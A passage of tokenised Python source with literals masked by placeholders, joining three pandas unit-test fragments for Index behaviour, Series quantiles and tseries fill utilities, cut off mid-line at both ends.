'<STR_LIT>' , f ) <EOL> def test_reindex_base ( self ) : <EOL> idx = self . create_index ( ) <EOL> expected = np . arange ( idx . size ) <EOL> actual = idx . get_indexer ( idx ) <EOL> tm . assert_numpy_array_equal ( expected , actual ) <EOL> with tm . assertRaisesRegexp ( ValueError , '<STR_LIT>' ) : <EOL> idx . get_indexer ( idx , method = '<STR_LIT>' ) <EOL> def test_ndarray_compat_properties ( self ) : <EOL> idx = self . create_index ( ) <EOL> self . assertTrue ( idx . T . equals ( idx ) ) <EOL> self . assertTrue ( idx . transpose ( ) . equals ( idx ) ) <EOL> values = idx . values <EOL> for prop in self . _compat_props : <EOL> self . assertEqual ( getattr ( idx , prop ) , getattr ( values , prop ) ) <EOL> idx . nbytes <EOL> idx . values . nbytes <EOL> def test_repr_roundtrip ( self ) : <EOL> idx = self . create_index ( ) <EOL> tm . assert_index_equal ( eval ( repr ( idx ) ) , idx ) <EOL> def test_str ( self ) : <EOL> idx = self . create_index ( ) <EOL> idx . name = '<STR_LIT:foo>' <EOL> self . assertTrue ( "<STR_LIT>" in str ( idx ) ) <EOL> self . assertTrue ( idx . __class__ . __name__ in str ( idx ) ) <EOL> def test_dtype_str ( self ) : <EOL> for idx in self . indices . values ( ) : <EOL> dtype = idx . dtype_str <EOL> self . assertIsInstance ( dtype , compat . string_types ) <EOL> if isinstance ( idx , PeriodIndex ) : <EOL> self . assertEqual ( dtype , '<STR_LIT>' ) <EOL> else : <EOL> self . assertEqual ( dtype , str ( idx . dtype ) ) <EOL> def test_repr_max_seq_item_setting ( self ) : <EOL> idx = self . create_index ( ) <EOL> idx = idx . repeat ( <NUM_LIT:50> ) <EOL> with pd . option_context ( "<STR_LIT>" , None ) : <EOL> repr ( idx ) <EOL> self . assertFalse ( '<STR_LIT>' in str ( idx ) ) <EOL> def test_wrong_number_names ( self ) : <EOL> def testit ( ind ) : <EOL> ind . names = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> for ind in self . indices . values ( ) : <EOL> assertRaisesRegexp ( ValueError , "<STR_LIT>" , testit , ind ) <EOL> def test_set_name_methods ( self ) : <EOL> new_name = "<STR_LIT>" <EOL> for ind in self . indices . values ( ) : <EOL> if isinstance ( ind , MultiIndex ) : <EOL> continue <EOL> original_name = ind . name <EOL> new_ind = ind . set_names ( [ new_name ] ) <EOL> self . assertEqual ( new_ind . name , new_name ) <EOL> self . assertEqual ( ind . name , original_name ) <EOL> res = ind . rename ( new_name , inplace = True ) <EOL> self . assertIsNone ( res ) <EOL> self . assertEqual ( ind . name , new_name ) <EOL> self . assertEqual ( ind . names , [ new_name ] ) <EOL> with assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> ind . set_names ( "<STR_LIT:a>" , level = <NUM_LIT:0> ) <EOL> name = ( '<STR_LIT:A>' , '<STR_LIT:B>' ) <EOL> ind . rename ( name , inplace = True ) <EOL> self . assertEqual ( ind . name , name ) <EOL> self . assertEqual ( ind . names , [ name ] ) <EOL> def test_hash_error ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> with tm . assertRaisesRegexp ( TypeError , "<STR_LIT>" % <EOL> type ( ind ) . __name__ ) : <EOL> hash ( ind ) <EOL> def test_copy_and_deepcopy ( self ) : <EOL> from copy import copy , deepcopy <EOL> for ind in self . indices . values ( ) : <EOL> if isinstance ( ind , MultiIndex ) : <EOL> continue <EOL> for func in ( copy , deepcopy ) : <EOL> idx_copy = func ( ind ) <EOL> self . assertIsNot ( idx_copy , ind ) <EOL> self . assertTrue ( idx_copy . equals ( ind ) ) <EOL> new_copy = ind . copy ( deep = True , name = "<STR_LIT>" ) <EOL> self . assertEqual ( new_copy . name , "<STR_LIT>" ) <EOL> def test_duplicates ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> if not len ( ind ) : <EOL> continue <EOL> if isinstance ( ind , MultiIndex ) : <EOL> continue <EOL> idx = self . _holder ( [ ind [ <NUM_LIT:0> ] ] * <NUM_LIT:5> ) <EOL> self . assertFalse ( idx . is_unique ) <EOL> self . assertTrue ( idx . has_duplicates ) <EOL> idx . name = '<STR_LIT:foo>' <EOL> result = idx . drop_duplicates ( ) <EOL> self . assertEqual ( result . name , '<STR_LIT:foo>' ) <EOL> self . assert_index_equal ( result , Index ( [ ind [ <NUM_LIT:0> ] ] , name = '<STR_LIT:foo>' ) ) <EOL> def test_sort ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> self . assertRaises ( TypeError , ind . sort ) <EOL> def test_order ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> with tm . assert_produces_warning ( FutureWarning ) : <EOL> ind . order ( ) <EOL> def test_mutability ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> if not len ( ind ) : <EOL> continue <EOL> self . assertRaises ( TypeError , ind . __setitem__ , <NUM_LIT:0> , ind [ <NUM_LIT:0> ] ) <EOL> def test_view ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> i_view = ind . view ( ) <EOL> self . assertEqual ( i_view . name , ind . name ) <EOL> def test_compat ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> self . assertEqual ( ind . tolist ( ) , list ( ind ) ) <EOL> def test_argsort ( self ) : <EOL> for k , ind in self . indices . items ( ) : <EOL> if k in [ '<STR_LIT>' ] : <EOL> continue <EOL> result = ind . argsort ( ) <EOL> expected = np . array ( ind ) . argsort ( ) <EOL> tm . assert_numpy_array_equal ( result , expected ) <EOL> def test_pickle ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> self . verify_pickle ( ind ) <EOL> ind . name = '<STR_LIT:foo>' <EOL> self . verify_pickle ( ind ) <EOL> def test_take ( self ) : <EOL> indexer = [ <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:2> ] <EOL> for k , ind in self . indices . items ( ) : <EOL> if k in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> continue <EOL> result = ind . take ( indexer ) <EOL> expected = ind [ indexer ] <EOL> self . assertTrue ( result . equals ( expected ) ) <EOL> if not isinstance ( ind , <EOL> ( DatetimeIndex , PeriodIndex , TimedeltaIndex ) ) : <EOL> with tm . assertRaises ( AttributeError ) : <EOL> ind . freq <EOL> def test_setops_errorcases ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> cases = [ <NUM_LIT:0.5> , '<STR_LIT>' ] <EOL> methods = [ idx . intersection , idx . union , idx . difference , <EOL> idx . symmetric_difference ] <EOL> for method in methods : <EOL> for case in cases : <EOL> assertRaisesRegexp ( TypeError , <EOL> "<STR_LIT>" , <EOL> method , case ) <EOL> def test_intersection_base ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> first = idx [ : <NUM_LIT:5> ] <EOL> second = idx [ : <NUM_LIT:3> ] <EOL> intersect = first . intersection ( second ) <EOL> if isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> self . assertTrue ( tm . equalContents ( intersect , second ) ) <EOL> cases = [ klass ( second . values ) <EOL> for klass in [ np . array , Series , list ] ] <EOL> for case in cases : <EOL> if isinstance ( idx , PeriodIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> result = first . intersection ( case ) <EOL> elif isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> result = first . intersection ( case ) <EOL> self . assertTrue ( tm . equalContents ( result , second ) ) <EOL> if isinstance ( idx , MultiIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( TypeError , msg ) : <EOL> result = first . intersection ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> def test_union_base ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> first = idx [ <NUM_LIT:3> : ] <EOL> second = idx [ : <NUM_LIT:5> ] <EOL> everything = idx <EOL> union = first . union ( second ) <EOL> self . assertTrue ( tm . equalContents ( union , everything ) ) <EOL> cases = [ klass ( second . values ) <EOL> for klass in [ np . array , Series , list ] ] <EOL> for case in cases : <EOL> if isinstance ( idx , PeriodIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> result = first . union ( case ) <EOL> elif isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> result = first . union ( case ) <EOL> self . assertTrue ( tm . equalContents ( result , everything ) ) <EOL> if isinstance ( idx , MultiIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( TypeError , msg ) : <EOL> result = first . union ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> def test_difference_base ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> first = idx [ <NUM_LIT:2> : ] <EOL> second = idx [ : <NUM_LIT:4> ] <EOL> answer = idx [ <NUM_LIT:4> : ] <EOL> result = first . difference ( second ) <EOL> if isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> self . assertTrue ( tm . equalContents ( result , answer ) ) <EOL> cases = [ klass ( second . values ) <EOL> for klass in [ np . array , Series , list ] ] <EOL> for case in cases : <EOL> if isinstance ( idx , PeriodIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> result = first . difference ( case ) <EOL> elif isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> elif isinstance ( idx , ( DatetimeIndex , TimedeltaIndex ) ) : <EOL> self . assertEqual ( result . __class__ , answer . __class__ ) <EOL> tm . assert_numpy_array_equal ( result . asi8 , answer . asi8 ) <EOL> else : <EOL> result = first . difference ( case ) <EOL> self . assertTrue ( tm . equalContents ( result , answer ) ) <EOL> if isinstance ( idx , MultiIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( TypeError , msg ) : <EOL> result = first . difference ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> def test_symmetric_difference ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> first = idx [ <NUM_LIT:1> : ] <EOL> second = idx [ : - <NUM_LIT:1> ] <EOL> if isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> answer = idx [ [ <NUM_LIT:0> , - <NUM_LIT:1> ] ] <EOL> result = first . symmetric_difference ( second ) <EOL> self . assertTrue ( tm . equalContents ( result , answer ) ) <EOL> cases = [ klass ( second . values ) <EOL> for klass in [ np . array , Series , list ] ] <EOL> for case in cases : <EOL> if isinstance ( idx , PeriodIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> result = first . symmetric_difference ( case ) <EOL> elif isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> result = first . symmetric_difference ( case ) <EOL> self . assertTrue ( tm . equalContents ( result , answer ) ) <EOL> if isinstance ( idx , MultiIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( TypeError , msg ) : <EOL> result = first . symmetric_difference ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> with tm . assert_produces_warning ( FutureWarning ) : <EOL> first . sym_diff ( second ) <EOL> def test_insert_base ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> result = idx [ <NUM_LIT:1> : <NUM_LIT:4> ] <EOL> if not len ( idx ) : <EOL> continue <EOL> self . assertTrue ( idx [ <NUM_LIT:0> : <NUM_LIT:4> ] . equals ( result . insert ( <NUM_LIT:0> , idx [ <NUM_LIT:0> ] ) ) ) <EOL> def test_delete_base ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> if not len ( idx ) : <EOL> continue <EOL> if isinstance ( idx , RangeIndex ) : <EOL> continue <EOL> expected = idx [ <NUM_LIT:1> : ] <EOL> result = idx . delete ( <NUM_LIT:0> ) <EOL> self . assertTrue ( result . equals ( expected ) ) <EOL> self . assertEqual ( result . name , expected . name ) <EOL> expected = idx [ : - <NUM_LIT:1> ] <EOL> result = idx . delete ( - <NUM_LIT:1> ) <EOL> self . assertTrue ( result . equals ( expected ) ) <EOL> self . assertEqual ( result . name , expected . name ) <EOL> with tm . assertRaises ( ( IndexError , ValueError ) ) : <EOL> result = idx . delete ( len ( idx ) ) <EOL> def test_equals_op ( self ) : <EOL> index_a = self . create_index ( ) <EOL> if isinstance ( index_a , PeriodIndex ) : <EOL> return <EOL> n = len ( index_a ) <EOL> index_b = index_a [ <NUM_LIT:0> : - <NUM_LIT:1> ] <EOL> index_c = index_a [ <NUM_LIT:0> : - <NUM_LIT:1> ] . append ( index_a [ - <NUM_LIT:2> : - <NUM_LIT:1> ] ) <EOL> index_d = index_a [ <NUM_LIT:0> : <NUM_LIT:1> ] <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == index_b <EOL> expected1 = np . array ( [ True ] * n ) <EOL> expected2 = np . array ( [ True ] * ( n - <NUM_LIT:1> ) + [ False ] ) <EOL> tm . assert_numpy_array_equal ( index_a == index_a , expected1 ) <EOL> tm . assert_numpy_array_equal ( index_a == index_c , expected2 ) <EOL> array_a = np . array ( index_a ) <EOL> array_b = np . array ( index_a [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) <EOL> array_c = np . array ( index_a [ <NUM_LIT:0> : - <NUM_LIT:1> ] . append ( index_a [ - <NUM_LIT:2> : - <NUM_LIT:1> ] ) ) <EOL> array_d = np . array ( index_a [ <NUM_LIT:0> : <NUM_LIT:1> ] ) <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == array_b <EOL> tm . assert_numpy_array_equal ( index_a == array_a , expected1 ) <EOL> tm . assert_numpy_array_equal ( index_a == array_c , expected2 ) <EOL> series_a = Series ( array_a ) <EOL> series_b = Series ( array_b ) <EOL> series_c = Series ( array_c ) <EOL> series_d = Series ( array_d ) <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == series_b <EOL> tm . assert_numpy_array_equal ( index_a == series_a , expected1 ) <EOL> tm . assert_numpy_array_equal ( index_a == series_c , expected2 ) <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == index_d <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == series_d <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == array_d <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> series_a == series_d <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> series_a == array_d <EOL> if not isinstance ( index_a , MultiIndex ) : <EOL> expected3 = np . array ( [ False ] * ( len ( index_a ) - <NUM_LIT:2> ) + [ True , False ] ) <EOL> item = index_a [ - <NUM_LIT:2> ] <EOL> tm . assert_numpy_array_equal ( index_a == item , expected3 ) <EOL> tm . assert_numpy_array_equal ( series_a == item , expected3 ) <EOL> def test_numpy_ufuncs ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> for func in [ np . exp , np . exp2 , np . expm1 , np . log , np . log2 , np . log10 , <EOL> np . log1p , np . sqrt , np . sin , np . cos , np . tan , np . arcsin , <EOL> np . arccos , np . arctan , np . sinh , np . cosh , np . tanh , <EOL> np . arcsinh , np . arccosh , np . arctanh , np . deg2rad , <EOL> np . rad2deg ] : <EOL> if isinstance ( idx , pd . tseries . base . DatetimeIndexOpsMixin ) : <EOL> with tm . assertRaises ( Exception ) : <EOL> func ( idx ) <EOL> elif isinstance ( idx , ( Float64Index , Int64Index ) ) : <EOL> result = func ( idx ) <EOL> exp = Index ( func ( idx . values ) , name = idx . name ) <EOL> self . assert_index_equal ( result , exp ) <EOL> self . assertIsInstance ( result , pd . Float64Index ) <EOL> else : <EOL> if len ( idx ) == <NUM_LIT:0> : <EOL> continue <EOL> else : <EOL> with tm . assertRaises ( Exception ) : <EOL> func ( idx ) <EOL> for func in [ np . isfinite , np . isinf , np . isnan , np . signbit ] : <EOL> if isinstance ( idx , pd . tseries . base . DatetimeIndexOpsMixin ) : <EOL> with tm . assertRaises ( Exception ) : <EOL> func ( idx ) <EOL> elif isinstance ( idx , ( Float64Index , Int64Index ) ) : <EOL> result = func ( idx ) <EOL> exp = func ( idx . values ) <EOL> self . assertIsInstance ( result , np . ndarray ) <EOL> tm . assertNotIsInstance ( result , Index ) <EOL> else : <EOL> if len ( idx ) == <NUM_LIT:0> : <EOL> continue <EOL> else : <EOL> with tm . assertRaises ( Exception ) : <EOL> func ( idx ) <EOL> def test_hasnans_isnans ( self ) : <EOL> for name , index in self . indices . items ( ) : <EOL> if isinstance ( index , MultiIndex ) : <EOL> pass <EOL> else : <EOL> idx = index . copy ( ) <EOL> expected = np . array ( [ False ] * len ( idx ) , dtype = bool ) <EOL> self . assert_numpy_array_equal ( idx . _isnan , expected ) <EOL> self . assertFalse ( idx . hasnans ) <EOL> idx = index . copy ( ) <EOL> values = idx . values <EOL> if len ( index ) == <NUM_LIT:0> : <EOL> continue <EOL> elif isinstance ( index , pd . tseries . base . DatetimeIndexOpsMixin ) : <EOL> values [ <NUM_LIT:1> ] = pd . tslib . iNaT <EOL> elif isinstance ( index , Int64Index ) : <EOL> continue <EOL> else : <EOL> values [ <NUM_LIT:1> ] = np . nan <EOL> if isinstance ( index , PeriodIndex ) : <EOL> idx = index . __class__ ( values , freq = index . freq ) <EOL> else : <EOL> idx = index . __class__ ( values ) <EOL> expected = np . array ( [ False ] * len ( idx ) , dtype = bool ) <EOL> expected [ <NUM_LIT:1> ] = True <EOL> self . assert_numpy_array_equal ( idx . _isnan , expected ) <EOL> self . assertTrue ( idx . hasnans ) <EOL> def test_fillna ( self ) : <EOL> for name , index in self . indices . items ( ) : <EOL> if len ( index ) == <NUM_LIT:0> : <EOL> pass <EOL> elif isinstance ( index , MultiIndex ) : <EOL> idx = index . copy ( ) <EOL> msg = "<STR_LIT>" <EOL> with self . assertRaisesRegexp ( NotImplementedError , msg ) : <EOL> idx . fillna ( idx [ <NUM_LIT:0> ] ) <EOL> else : <EOL> idx = index . copy ( ) <EOL> result = idx . fillna ( idx [ <NUM_LIT:0> ] ) <EOL> self . assert_index_equal ( result , idx ) <EOL> self . assertFalse ( result is idx ) <EOL> msg = "<STR_LIT>" <EOL> with self . assertRaisesRegexp ( TypeError , msg ) : <EOL> idx . fillna ( [ idx [ <NUM_LIT:0> ] ] ) <EOL> idx = index . copy ( ) <EOL> values = idx . values <EOL> if isinstance ( index , pd . tseries . base . DatetimeIndexOpsMixin ) : <EOL> values [ <NUM_LIT:1> ] = pd . tslib . iNaT <EOL> elif isinstance ( index , Int64Index ) : <EOL> continue <EOL> else : <EOL> values [ <NUM_LIT:1> ] = np . nan <EOL> if isinstance ( index , PeriodIndex ) : <EOL> idx = index . __class__ ( values , freq = index . freq ) <EOL> else : <EOL> idx = index . __class__ ( values ) <EOL> expected = np . array ( [ False ] * len ( idx ) , dtype = bool ) <EOL> expected [ <NUM_LIT:1> ] = True <EOL> self . assert_numpy_array_equal ( idx . _isnan , expected ) <EOL> self . assertTrue ( idx . hasnans ) </s>
<s> import nose <EOL> import numpy as np <EOL> import pandas as pd <EOL> from pandas import ( Index , Series , _np_version_under1p9 ) <EOL> from pandas . tseries . index import Timestamp <EOL> import pandas . core . common as com <EOL> import pandas . util . testing as tm <EOL> from . common import TestData <EOL> class TestSeriesQuantile ( TestData , tm . TestCase ) : <EOL> def test_quantile ( self ) : <EOL> from numpy import percentile <EOL> q = self . ts . quantile ( <NUM_LIT:0.1> ) <EOL> self . assertEqual ( q , percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) ) <EOL> q = self . ts . quantile ( <NUM_LIT> ) <EOL> self . assertEqual ( q , percentile ( self . ts . valid ( ) , <NUM_LIT> ) ) <EOL> q = Series ( self . ts , dtype = object ) . quantile ( <NUM_LIT> ) <EOL> self . assertEqual ( q , percentile ( self . ts . valid ( ) , <NUM_LIT> ) ) <EOL> dts = self . ts . index . to_series ( ) <EOL> q = dts . quantile ( <NUM_LIT> ) <EOL> self . assertEqual ( q , Timestamp ( '<STR_LIT>' ) ) <EOL> tds = dts . diff ( ) <EOL> q = tds . quantile ( <NUM_LIT> ) <EOL> self . assertEqual ( q , pd . to_timedelta ( '<STR_LIT>' ) ) <EOL> result = Series ( [ np . timedelta64 ( '<STR_LIT>' ) ] ) . sum ( ) <EOL> self . assertTrue ( result is pd . NaT ) <EOL> msg = '<STR_LIT>' <EOL> for invalid in [ - <NUM_LIT:1> , <NUM_LIT:2> , [ <NUM_LIT:0.5> , - <NUM_LIT:1> ] , [ <NUM_LIT:0.5> , <NUM_LIT:2> ] ] : <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> self . ts . quantile ( invalid ) <EOL> def test_quantile_multi ( self ) : <EOL> from numpy import percentile <EOL> qs = [ <NUM_LIT> , <NUM_LIT> ] <EOL> result = self . ts . quantile ( qs ) <EOL> expected = pd . Series ( [ percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) , <EOL> percentile ( self . ts . valid ( ) , <NUM_LIT> ) ] , <EOL> index = qs , name = self . ts . name ) <EOL> tm . assert_series_equal ( result , expected ) <EOL> dts = self . ts . index . to_series ( ) <EOL> dts . name = '<STR_LIT>' <EOL> result = dts . quantile ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> expected = Series ( [ Timestamp ( '<STR_LIT>' ) , <EOL> Timestamp ( '<STR_LIT>' ) ] , <EOL> index = [ <NUM_LIT> , <NUM_LIT> ] , name = '<STR_LIT>' ) <EOL> tm . assert_series_equal ( result , expected ) <EOL> result = self . ts . quantile ( [ ] ) <EOL> expected = pd . Series ( [ ] , name = self . ts . name , index = Index ( <EOL> [ ] , dtype = float ) ) <EOL> tm . assert_series_equal ( result , expected ) <EOL> def test_quantile_interpolation ( self ) : <EOL> if _np_version_under1p9 : <EOL> raise nose . SkipTest ( "<STR_LIT>" ) <EOL> from numpy import percentile <EOL> q = self . ts . quantile ( <NUM_LIT:0.1> , interpolation = '<STR_LIT>' ) <EOL> self . assertEqual ( q , percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) ) <EOL> q1 = self . ts . quantile ( <NUM_LIT:0.1> ) <EOL> self . assertEqual ( q1 , percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) ) <EOL> self . assertEqual ( q , q1 ) <EOL> def test_quantile_interpolation_dtype ( self ) : <EOL> if _np_version_under1p9 : <EOL> raise nose . SkipTest ( "<STR_LIT>" ) <EOL> from numpy import percentile <EOL> q = pd . Series ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) . quantile ( <NUM_LIT:0.5> , interpolation = '<STR_LIT>' ) <EOL> self . assertEqual ( q , percentile ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) , <NUM_LIT:50> ) ) <EOL> self . assertTrue ( com . is_integer ( q ) ) <EOL> q = pd . Series ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) . quantile ( <NUM_LIT:0.5> , interpolation = '<STR_LIT>' ) <EOL> self . assertEqual ( q , percentile ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) , <NUM_LIT:50> ) ) <EOL> self . assertTrue ( com . is_integer ( q ) ) <EOL> def test_quantile_interpolation_np_lt_1p9 ( self ) : <EOL> if not _np_version_under1p9 : <EOL> raise nose . SkipTest ( "<STR_LIT>" ) <EOL> from numpy import percentile <EOL> q = self . ts . quantile ( <NUM_LIT:0.1> , interpolation = '<STR_LIT>' ) <EOL> self . assertEqual ( q , percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) ) <EOL> q1 = self . ts . quantile ( <NUM_LIT:0.1> ) <EOL> self . assertEqual ( q1 , percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) ) <EOL> expErrMsg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( ValueError , expErrMsg ) : <EOL> self . ts . quantile ( <NUM_LIT> , interpolation = '<STR_LIT>' ) <EOL> with tm . assertRaisesRegexp ( ValueError , expErrMsg ) : <EOL> q = Series ( self . ts , dtype = object ) . quantile ( <NUM_LIT> , <EOL> interpolation = '<STR_LIT>' ) <EOL> def test_quantile_nan ( self ) : <EOL> cases = [ Series ( [ ] ) , Series ( [ np . nan , np . nan ] ) ] <EOL> for s in cases : <EOL> res = s . quantile ( <NUM_LIT:0.5> ) <EOL> self . assertTrue ( np . isnan ( res ) ) <EOL> res = s . quantile ( [ <NUM_LIT:0.5> ] ) <EOL> tm . assert_series_equal ( res , pd . Series ( [ np . nan ] , index = [ <NUM_LIT:0.5> ] ) ) <EOL> res = s . quantile ( [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> tm . assert_series_equal ( res , pd . Series ( [ np . nan , np . nan ] , <EOL> index = [ <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> def test_quantile_box ( self ) : <EOL> cases = [ [ pd . Timestamp ( '<STR_LIT>' ) , pd . Timestamp ( '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' ) ] , <EOL> [ pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) ] , <EOL> [ pd . Timedelta ( '<STR_LIT>' ) , pd . Timedelta ( '<STR_LIT>' ) , <EOL> pd . Timedelta ( '<STR_LIT>' ) ] , <EOL> [ pd . Timestamp ( '<STR_LIT>' ) , pd . Timestamp ( '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' ) , pd . NaT ] , <EOL> [ pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) , pd . NaT ] , <EOL> [ pd . Timedelta ( '<STR_LIT>' ) , pd . Timedelta ( '<STR_LIT>' ) , <EOL> pd . Timedelta ( '<STR_LIT>' ) , pd . NaT ] ] <EOL> for case in cases : <EOL> s = pd . Series ( case , name = '<STR_LIT>' ) <EOL> res = s . quantile ( <NUM_LIT:0.5> ) <EOL> self . assertEqual ( res , case [ <NUM_LIT:1> ] ) <EOL> res = s . quantile ( [ <NUM_LIT:0.5> ] ) <EOL> exp = pd . Series ( [ case [ <NUM_LIT:1> ] ] , index = [ <NUM_LIT:0.5> ] , name = '<STR_LIT>' ) <EOL> tm . assert_series_equal ( res , exp ) <EOL> def test_datetime_timedelta_quantiles ( self ) : <EOL> self . assertTrue ( pd . isnull ( Series ( [ ] , dtype = '<STR_LIT>' ) . quantile ( <NUM_LIT> ) ) ) <EOL> self . assertTrue ( pd . isnull ( Series ( [ ] , dtype = '<STR_LIT>' ) . quantile ( <NUM_LIT> ) ) ) <EOL> def test_quantile_nat ( self ) : <EOL> res = Series ( [ pd . NaT , pd . NaT ] ) . quantile ( <NUM_LIT:0.5> ) <EOL> self . assertTrue ( res is pd . NaT ) <EOL> res = Series ( [ pd . NaT , pd . NaT ] ) . quantile ( [ <NUM_LIT:0.5> ] ) <EOL> tm . assert_series_equal ( res , pd . Series ( [ pd . NaT ] , index = [ <NUM_LIT:0.5> ] ) ) </s>
<s> from numpy import nan <EOL> import numpy as np <EOL> from pandas import Index , isnull , Timestamp <EOL> from pandas . util . testing import assert_almost_equal <EOL> import pandas . util . testing as tm <EOL> from pandas . compat import range , lrange , zip <EOL> import pandas . lib as lib <EOL> import pandas . _period as period <EOL> import pandas . algos as algos <EOL> from pandas . core import common as com <EOL> import datetime <EOL> class TestTseriesUtil ( tm . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> def test_combineFunc ( self ) : <EOL> pass <EOL> def test_reindex ( self ) : <EOL> pass <EOL> def test_isnull ( self ) : <EOL> pass <EOL> def test_groupby ( self ) : <EOL> pass <EOL> def test_groupby_withnull ( self ) : <EOL> pass <EOL> def test_backfill ( self ) : <EOL> old = Index ( [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:10> ] ) <EOL> new = Index ( lrange ( <NUM_LIT:12> ) ) <EOL> filler = algos . backfill_int64 ( old . values , new . values ) <EOL> expect_filler = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , - <NUM_LIT:1> ] <EOL> self . assert_numpy_array_equal ( filler , expect_filler ) <EOL> old = Index ( [ <NUM_LIT:1> , <NUM_LIT:4> ] ) <EOL> new = Index ( lrange ( <NUM_LIT:5> , <NUM_LIT:10> ) ) <EOL> filler = algos . backfill_int64 ( old . values , new . values ) <EOL> expect_filler = [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] <EOL> self . assert_numpy_array_equal ( filler , expect_filler ) <EOL> def test_pad ( self ) : <EOL> old = Index ( [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:10> ] ) <EOL> new = Index ( lrange ( <NUM_LIT:12> ) ) <EOL> filler = algos . pad_int64 ( old . values , new . values ) <EOL> expect_filler = [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , 